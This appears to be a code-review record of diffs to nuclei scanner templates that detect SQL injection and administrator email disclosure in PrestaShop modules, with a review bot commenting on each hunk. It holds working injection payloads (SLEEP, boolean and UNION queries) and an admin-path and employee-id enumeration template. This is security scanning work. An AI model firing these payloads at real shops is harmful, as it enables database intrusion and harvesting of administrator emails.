POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=-{{rand_int(0000, 9999)}})
matchers-condition: or
matchers:
- type: dsl
@@ -77,6 +93,13 @@ http:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
condition: and
- type: dsl
name: time-based
dsl:
- 'duration_5>=6'
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
condition: and
- type: dsl
name: blind-based
dsl:
@@ -86,6 +109,13 @@ http:
- 'len(body_3) > 200 && len(body_4) <= 22'
condition: and
- type: dsl
name: error-based
dsl:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'contains(body_6, "You have an error in your SQL syntax")'
condition: and
extractors:
- type: regex
name: version
@@ -93,5 +123,4 @@ http:
internal: true
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
# digest: 4b0a00483046022100bf6e7d4b44a6007e53495c84140743e2b8d4bb09af20cea698154be028e2302e022100c747f0965cca6cb175e486238b6992e5f236119209dad85440dcb14f94f2195b:922c64590222798bb761d5b6d8e72950
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
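Review bot: `max-request: 4` in the first hunk is left unchanged although the commit adds two further raw requests (the `pro_add` time-based probe and the `pro_add` error-based probe in the fourth hunk), so the metadata no longer matches the six requests the template sends; the same field was bumped in CVE-2023-27032 and CVE-2023-27847 in this commit. Change it to `max-request: 6`. The new `error-based` matcher keys on `contains(body_6, "You have an error in your SQL syntax")`, which only fires when the target echoes database errors, so it adds coverage but the version gate `compare_versions(version, "<= 2.4.4")` remains the only control against false positives for that branch; that seems acceptable but is worth a short comment above the matcher so the next editor does not drop the gate. The `matchers` list these hunks touch starts before the fifth hunk and its `extractors` tail continues into the last one.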


@@ -0,0 +1,217 @@
id: CVE-2022-31101
info:
name: Prestashop Blockwishlist 2.1.0 SQL Injection
author: mastercho
severity: high
description: |
Prestashop Blockwishlist module version 2.1.0 suffers from a remote authenticated SQL injection vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31101
- https://github.com/PrestaShop/blockwishlist/security/advisories/GHSA-2jx3-5j9v-prpp
- https://packetstormsecurity.com/files/168003/Prestashop-Blockwishlist-2.1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2022-31101
cwe-id: CWE-89
epss-score: 0.13829
epss-percentile: 0.93938
cpe: cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:*
metadata:
max-request: 8
vendor: prestashop
product: blockwishlist
tags: packetstorm,cve,cve2022,prestashop,prestashop-module,sqli,intrusive
variables:
first_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
last_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
password: "{{rand_base(8)}}"
flow: |
http(1) && http(2) && http(3) && http(4) && (template["id_wishlist"] && template["id_wishlist"][0] ? (http(7) && http(8)) : (http(5) && http(6) && http(7) && http(8)))
http:
- method: GET
path:
- "{{BaseURL}}/modules/blockwishlist/config.xml"
extractors:
- type: regex
name: version
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: status
status:
- 200
internal: true
- type: word
part: body
words:
- "Wishlist block"
internal: true
- type: dsl
name: version_check
dsl:
- compare_versions(version, '>= 2.0.0', '<= 2.1.0')
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
extractors:
- type: regex
name: id_product_raw
part: body
group: 1
regex:
- '/(\d+)-[a-z0-9\-]+\.html'
internal: true
- type: dsl
name: id_product
dsl:
- index(id_product_raw, 0)
internal: true
- raw:
- |
POST /{{login_path}}?create_account=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id_gender=1&firstname={{first_name}}&lastname={{last_name}}&email={{email}}&password={{password}}&birthday=&customer_privacy=1&psgdpr=1&submitCreate=1
payloads:
login_path:
- login
- en/login
- fr/login
- de/login
- pl/login
- es/login
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- regex('PrestaShop-[0-9a-f]{32}', header)
- status_code == 302
condition: and
internal: true
- raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
extractors:
- type: json
name: id_wishlist_raw
part: body
json:
- .wishlists[0].id_wishlist
internal: true
- type: dsl
name: id_wishlist
dsl:
- index(id_wishlist_raw, 0)
internal: true
- id: create-wishlist
raw:
- |
GET /module/blockwishlist/action?action=createNewWishlist&params[name]=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success"'
internal: true
- id: fetch-new-wishlist
raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: id_wishlist_raw
part: body
group: 1
regex:
- '"id_wishlist":"(\d+)"'
internal: true
- type: dsl
name: id_wishlist
dsl:
- 'index(id_wishlist_raw, 0)'
internal: true
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
- id: add-product
raw:
- |
POST /module/blockwishlist/action?action=addProductToWishlist&params[id_product]={{id_product}}&params[idWishList]={{id_wishlist_raw}}&params[quantity]=1&params[id_product_attribute]=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success":true'
internal: true
- id: sql-inj
raw:
- |
GET /module/blockwishlist/view?id_wishlist={{id_wishlist_raw}}&order=p.name,%20(select%20case%20when%20(1=1)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: time-based
dsl:
- 'duration >= 7'
- 'contains(to_lower(body), "prestashop")'
condition: and
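Review bot: The `add-product` and `sql-inj` requests interpolate `{{id_wishlist_raw}}` even though both extractor blocks derive a normalised `id_wishlist` via `index(id_wishlist_raw, 0)` and `flow` tests `template["id_wishlist"]`; if the regex in `fetch-new-wishlist` matches more than one wishlist, `id_wishlist_raw` presumably holds a list rather than a single id and the URL is built from that list. Use `{{id_wishlist}}` in both requests so the requests and the flow agree on one value. The `sql-inj` request depends on a 7 s `SLEEP` and a `duration >= 7` matcher but carries no `@timeout` annotation, unlike the time-based requests elsewhere in this commit (`@timeout: 20s`); a default client timeout shorter than the sleep would turn a true positive into a miss, so add `@timeout: 20s` above the request line. The template registers a customer account and creates a wishlist on the target and never removes them; beyond the `intrusive` tag, state that in `description`, e.g. `This template creates a customer account and a wishlist on the target and does not clean them up.` If `max-request` is meant to count payload iterations, the six `login_path` payloads in the third request put the total at 13 rather than 8.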


@@ -15,23 +15,47 @@ info:
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.38387
epss-percentile: 0.9706
epss-percentile: 0.97054
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 2
max-request: 3
vendor: idnovate
product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter"
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: "http.component:\"prestashop\""
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln
flow: |
http(1) && (http(2) || http(3))
http:
- raw:
- id: "extract_values"
raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 5
extractors:
- type: regex
name: time
group: 1
regex:
- '"time":([0-9]+),'
internal: true
- type: regex
name: token
group: 1
regex:
- '"static_token":"([0-9a-z]+)",'
internal: true
- id: "time_based"
raw:
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
@@ -40,27 +64,46 @@ http:
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F
stop-at-first-match: true
matchers:
- type: dsl
name: time-based
dsl:
- duration_2>=6
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body, 'popups','hasError')
- contains_all(body,'hasError')
- duration >= 6
condition: and
extractors:
- type: regex
name: time
group: 1
regex:
- ',"time":([0-9]+),'
internal: true
- id: "blind_based"
raw:
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- type: regex
name: token
group: 1
regex:
- ',"static_token":"([0-9a-z]+)",'
internal: true
# digest: 4a0a0047304502207618e1d8fdfba3f49b72932ca68e147e4ba9d5b79594b0fff44f4f62758182f5022100c7cebc0d8b2c06d2e82fb7eb051a7bc50a4e91c5a6e909216e2e3e4cdd97d1b1:922c64590222798bb761d5b6d8e72950
availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
matchers:
- type: dsl
name: blind-based
dsl:
- 'status_code == 200'
- 'contains(tolower(response_1), "selector")'
- '!contains(tolower(response_2), "selector")'
condition: and
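Review bot: The `time_based` block annotates its two requests as `@timeout 20s` while every other template touched by this commit writes `@timeout: 20s` (CVE-2022-22897, CVE-2023-27847); if the annotation parser requires the colon, these lines are not recognised as annotations and the requests run with the default timeout, which is exactly what a 6 s sleep with a `duration >= 6` matcher cannot afford. Write `@timeout: 20s` on both. In the same matcher list, `contains_all(body,'hasError')` has a single argument and is just `contains(body, 'hasError')`; the single-token form reads more honestly. The `blind_based` pair `contains(tolower(response_1), "selector")` / `!contains(tolower(response_2), "selector")` distinguishes the true and false conditions by one word only, so a one-line comment naming what "selector" indicates in the popup response would help whoever next tunes these matchers. The `time_based` request block begins at the end of the first hunk and continues into the second.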


@@ -7,7 +7,7 @@ info:
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
reference:
- https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27847
@@ -20,13 +20,13 @@ info:
epss-percentile: 0.98722
metadata:
verified: true
max-request: 2
max-request: 5
framework: prestashop
shodan-query: html:"/xipblog"
fofa-query: app="Prestashop"
tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog,vuln
flow: http(1) && http(2)
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
num: "999999999"
@@ -37,34 +37,71 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(response), "prestashop", "xipblog")'
- type: word
part: body
words:
- 'xipblog'
internal: true
- raw:
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(10)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
matchers:
- type: word
name: union-based
part: body_1
words:
- '{{md5({{num}})}}'
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=10'
# digest: 4a0a00473045022066b32803f87dd2f179912e061bc35cf781389eef5302b8c7ce22a1c884f30e56022100ceac4cea1e4063b960ed7cf0b3c93ff0fc2f4ead215e27a0d50fcc2df572b90b:922c64590222798bb761d5b6d8e72950
- 'duration >= 5'
- 'status_code != 404'
condition: and
- raw:
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: word
part: body
words:
- 'kr_blog_post_area'
internal: true
- raw:
- |
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: blind-based
dsl:
- '!contains(body, "kr_blog_post_area")'
internal: false
- raw:
- |
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: union-based
dsl:
- 'status_code != 404'
- 'contains(body, "{{md5({{num}})}}")'
condition: and
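Review bot: With `flow: http(1) && http(2) && http(3) && http(4) && http(5)` the template now fires only when the time-based, boolean-blind and UNION probes all succeed, so an injectable xipblog install whose archive query does not have exactly the 29 columns pinned by the NULL list at http(5) is reported clean even though http(2)–http(4) already proved the injection. If the FP fix only needs two independent confirmations, `flow: http(1) && http(2) && ((http(3) && http(4)) || http(5))` keeps the stricter gate without making the union column shape mandatory, assuming nuclei's flow expression accepts grouping as written (not verified here). Separately, `internal: false` on the blind-based matcher is the default and can be dropped, and the `duration >= 5` check at http(2) accepts a single 5-second delay where the replaced matcher required the 10-second `duration_2>=10` differential, so a slow host clears it on its own and the AND with the later probes is what now carries the FP protection.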


@@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-30150
cwe-id: CWE-89
epss-score: 0.5798
epss-percentile: 0.98068
epss-score: 0.51724
epss-percentile: 0.97536
cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:*
metadata:
verified: true
@@ -29,26 +29,61 @@ info:
vendor: leotheme
product: leocustomajax
framework: prestashop
shodan-query:
- http.component:"Prestashop"
- http.component:"prestashop"
tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme,vkev,vuln
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,time-based-sqli,leotheme,vkev,vuln
variables:
random_id: "{{rand_text_numeric(13)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
GET /modules/leocustomajax/leocustomajax.js HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body,'leocustomajax','processajax','.quick-view','leoajax')"
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /modules/leocustomajax/leoajax.php?rand={{random_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
- |
@timeout: 20s
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'contains(tolower(response_1), "prestashop")'
- 'duration_1>=6'
- 'contains(tolower(body_1), "pro_add")'
condition: and
# digest: 4a0a00473045022100f8004ab878eca88f094e293d4c0308c2331a64a30550de16a8879d127f06c91e02205cb264f25987d051fc5ccb614da8f98356b1e36469e85ad8050663590f0c016d:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(content_type, "text/html")'
condition: and
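Review bot: The second DSL matcher mixes indexed and unindexed response variables: `duration_2>=6` and `status_code_2 == 200` refer to the cat_list GET, but `contains(content_type, "text/html")` is unindexed and, with `stop-at-first-match: true` over two raw requests, is evaluated against whichever response is current; change it to `contains(content_type_2, "text/html")` so all three terms describe the same response. Both matchers also rely on one absolute 6-second threshold with no non-sleeping baseline, so a host that is merely slow and echoes `pro_add` in the body still satisfies the first matcher; if FP reports continue, a control request using `sleep(0)` and a `duration_1 - duration_0 >= 5` style comparison would be the next step. Since `matchers-condition` is not set the two matchers are OR-ed, which I take to be intended.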


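--- /dev/null
+++ b/CVE-2025-51586.yaml
+id: CVE-2025-51586
+info:
+name: PrestaShop - Information Disclosure
+author: mastercho
+severity: medium
+description: |
+User enumeration vulnerability in the AdminLogin controller in PrestaShop 1.7 through 8.2.2 allows remote attackers to obtain administrators user email addresses via manipulation of the id_employee and reset_token parameters. An attacker who has access to the Back Office login URL can trigger the password reset form to disclose the associated email address in a hidden field, even when the provided reset token is invalid. This issue has been fixed in 8.2.3.
+reference:
+- https://maxime-morel.github.io/advisories/2025/CVE-2025-51586.md
+- https://security.friendsofpresta.org/core/2025/09/04/CVE-2025-51586.html
+- https://nvd.nist.gov/vuln/detail/CVE-2025-51586
+classification:
+cwe-id: CWE-359
+metadata:
+verified: true
+vendor: prestashop
+product: prestashop
+shodan-query: http.component:"prestashop"
+tags: cve,cve2025,prestashop,disclosure,token
+variables:
+token: "{{rand_base(32)}}"
+token2: "{{rand_base(32)}}"
+flow: |
+// 1) Run panel detection on all common admin paths
+http(1);
+// 2) Unwrap matchedpath (extractors return a list in flow)
+var path = "";
+if (template["matchedpath"] && template["matchedpath"].length) {
+for (let p of iterate(template["matchedpath"])) {
+path = p;
+break; // use first detected admin path
+}
+}
+// 3) Unwrap version (first extracted value)
+var v = "";
+if (template["version"] && template["version"].length) {
+for (let ver of iterate(template["version"])) {
+v = ver;
+break;
+}
+}
+// 4) JS version check: vulnerable if version < 8.2.3
+function isVulnerable(ver) {
+if (!ver) return true; // unknown version -> still test
+var parts = (ver + "").split(".");
+var M = parseInt(parts[0] || "0", 10);
+var m = parseInt(parts[1] || "0", 10);
+var p = parseInt(parts[2] || "0", 10);
+if (M < 8) return true;
+if (M > 8) return false;
+if (m < 2) return true;
+if (m > 2) return false;
+return p < 3; // 8.2.08.2.2 are vuln; 8.2.3+ are not
+}
+// 5) Only execute http(2) if we have a path AND the version is vulnerable
+if (path && isVulnerable(v)) {
+set("matchedpath", path); // scalar for interpolation in http(2)
+http(2);
+}
+http:
+- id: detect-panel
+method: GET
+path:
+- '{{BaseURL}}/{{paths}}/'
+payloads:
+paths:
+- 'backoffice'
+- 'back-office'
+- 'Backoffice'
+- 'admin-dev'
+- 'backend'
+- 'admin_'
+- 'mikromanage'
+- 'manage'
+- 'manager'
+- 'adminshop'
+- 'administrator'
+- 'administracja'
+- 'adm'
+- 'webadmin'
+- 'admin-web'
+- 'kontrollpanel'
+- 'amministra'
+- 'adminas'
+- 'admin123'
+- 'admin0'
+- 'adminxx'
+- 'admin'
+- 'ps-admin'
+- 'admins'
+- 'p-office'
+- 'admin333'
+- 'admin4444'
+- 'admin66'
+- 'backadmin'
+- 'admin1'
+- 'BackofficeNEW'
+- '4dm1n'
+- 'administrazione'
+- 'accesadministrateur'
+- '_admin123'
+- 'iadmin'
+- 'panel'
+host-redirects: true
+max-redirects: 3
+extractors:
+- type: regex
+name: matchedpath
+part: body
+group: 1
+internal: true
+regex:
+- 'value="https?:\/\/[^\/]+\/((?:[A-Za-z]{2}\/)?(?:[A-Za-z0-9_-]*admin(?:-dev)?|[Bb]ackoffice|adm|panel)[^"]*?)\/'
+- type: regex
+name: version
+part: body
+internal: true
+group: 1
+regex:
+- 'login\.js\?v=([0-9.]+)'
+stop-at-first-match: true
+matchers-condition: or
+matchers:
+- type: word
+part: body
+words:
+- 'PrestaShop'
+- 'class="show-forgot-password'
+condition: and
+- type: word
+part: body
+words:
+- 'themes/default/css/admin-theme.css'
+- 'class="show-forgot-password'
+condition: and
+- id: generate-token
+method: GET
+path:
+- '{{Scheme}}://{{Hostname}}/{{matchedpath}}/index.php?controller=AdminLogin&token={{token}}&id_employee={{id}}&reset_token={{token2}}'
+payloads:
+id:
+- '1'
+- '2'
+- '3'
+- '4'
+- '5'
+- '6'
+- '7'
+- '8'
+- '9'
+- '10'
+- '11'
+- '12'
+- '13'
+- '14'
+- '15'
+- '16'
+- '17'
+- '18'
+- '19'
+- '20'
+- '21'
+- '22'
+- '23'
+- '24'
+- '25'
+- '26'
+- '27'
+- '28'
+- '29'
+- '30'
+iterate-all: true
+extractors:
+- type: regex
+name: reset-email
+part: body
+group: 1
+regex:
+- '<input[^>]*name="reset_email"[^>]*value="([^"]+)"'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- 'AdminLogin'
+- 'PrestaShop'
+condition: and
+- type: status
+status:
+- 200
+- type: regex
+part: body
+regex:
+- '<input[^>]*name="reset_email"[^>]*value="([^"]+)"'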
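Review bot: `info.metadata` declares no `max-request`, although this template can send up to 38 panel probes at http(1) plus 30 `id_employee` probes at http(2) per host, and the sibling templates touched in this commit (CVE-2023-27847, for example) do carry one; add `max-request: 68` next to `verified: true` so the request budget is visible to template linting and to operators. The trailing comment on `return p < 3;` inside `isVulnerable` reads `8.2.08.2.2`, which looks like a lost dash, and should be `return p < 3; // 8.2.0-8.2.2 are vuln; 8.2.3+ are not`. With `iterate-all: true` and no `stop-at-first-match`, http(2) keeps sending all 30 ids after the first address has been disclosed; that is reasonable if the intent is to enumerate every account, but for pure detection a `stop-at-first-match: true` on http(2) would halt at the first `reset_email` hit and keep fewer administrator addresses out of scan output.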


@@ -19,7 +19,6 @@ info:
shodan-query:
- http.component:"Prestashop"
- cpe:"cpe:2.3:a:prestashop:prestashop"
- http.component:"prestashop"
tags: prestashop,panel,login,discovery
http:
@@ -30,6 +29,7 @@ http:
payloads:
paths:
- 'backoffice'
- 'back-office'
- 'Backoffice'
- 'back-office'
- 'admin-dev'
@@ -52,9 +52,32 @@ http:
- 'adminxx'
- 'admin'
- 'ps-admin'
- 'admins'
- 'p-office'
- 'admin333'
- 'admin4444'
- 'admin66'
- 'backadmin'
- 'admin1'
- 'BackofficeNEW'
- '4dm1n'
- 'administrazione'
- 'accesadministrateur'
- '_admin123'
- 'iadmin'
- 'panel'
host-redirects: true
max-redirects: 3
stop-at-first-match: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- '<script type="text\/javascript" src="..\/js\/admin\/login.js\?v=([\d.]+)"><\/script>'
matchers-condition: or
matchers:
@@ -71,4 +94,4 @@ http:
- 'themes/default/css/admin-theme.css' # For modified admin panels
- 'class="show-forgot-password'
condition: and
# digest: 4a0a00473045022100c8b10c7b44eece6ef6aa824f902008c6bebf4c5b73a10dc82359fc7cc953b46202207307138c84e982ea5233074c5dc9969ed0121319a0e6127c007ba737d969486a:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202e2aa076aeb51730ae9cf724df7d316a78ee1d38b6ade213d5839439a392f5db022002387b32693ae53791993436a10343c65e3911eb19d3b48fb23f2be2a59609cf:922c64590222798bb761d5b6d8e72950
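Review bot: The new `version` extractor regex `<script type="text\/javascript" src="..\/js\/admin\/login.js\?v=([\d.]+)"><\/script>` is anchored on an exact attribute order and on the `../js/admin/` relative path, so a back office that serves login.js from an absolute or themed path is matched as a panel but yields no version; the CVE-2025-51586 template added in this same commit extracts the same value with the looser `login\.js\?v=([0-9.]+)`, and using that form here keeps the two templates consistent. The `paths` payload after this hunk appears to list `back-office` twice (once after `backoffice`, once after `Backoffice`); if both survive on the new side the same URL is probed twice per host and one entry should be dropped, though the rendered diff does not show which line is the addition.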


@@ -46,6 +46,7 @@ http:
- "/_profiler/phpinfo"
- "/?phpinfo=1"
- "/l.php?act=phpinfo"
- "/testxx.php"
stop-at-first-match: true